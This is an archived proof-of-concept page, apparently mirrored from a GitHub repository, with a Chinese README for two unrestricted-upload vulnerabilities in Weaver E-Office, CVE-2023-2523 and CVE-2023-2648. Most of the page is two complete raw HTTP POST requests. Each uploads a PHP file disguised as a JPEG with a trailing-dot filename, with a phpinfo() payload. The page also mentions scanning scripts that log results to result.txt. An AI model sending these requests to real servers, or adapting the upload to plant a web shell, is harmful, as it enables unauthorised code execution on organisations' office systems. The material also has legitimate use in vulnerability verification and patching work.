Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-2523 PoC — Weaver E-Office 代码问题漏洞

Source
https://github.com/werwolfz/cve-2023-2523-and-cve-2023-2648
Associated Vulnerability
Title:Weaver E-Office 代码问题漏洞 (CVE-2023-2523)
Description:Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。 Weaver E-Office 9.5版本存在代码问题漏洞,该漏洞源于App/Ajax/ajax.php?action=mobile_upload_save 存在未知函数,通过参数 upload_quwan 导致不受限制的上传。
Description
泛微 cve-2023-2523-and-cve-2023-2648
Readme
## cve-2023-2523

备注:脚本上传了phpinfo文件

使用方法:

结果自动保存到result.txt文件

<img width="718" alt="图片" src="https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648/assets/77956516/9880c28c-49e9-42f0-92a6-0cbca20bd2fb">

手工POC:

```
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
Host: your-ip
Content-Length: 352
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
 
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg
 
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
 
 
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
```


## cve-2023-2648

备注:脚本上传了phpinfo文件

使用方法:

结果自动保存到result.txt文件

<img width="713" alt="图片" src="https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648/assets/77956516/60583e7a-e2ba-4697-af95-b2f4a755b59a">

手工POC:

```
POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1
Host: your-ip
Content-Length: 204
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
 
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Fdiledata"; filename="uploadify.php."
Content-Type: image/jpeg
 
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
```
File Snapshot

 [4.0K]  /data/pocs/abdef7dd940613b4224a63ef5575804650d67579
├── [3.3K]  CVE-2023-2523.py
├── [2.8K]  CVE-2023-2648.py
└── [2.3K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.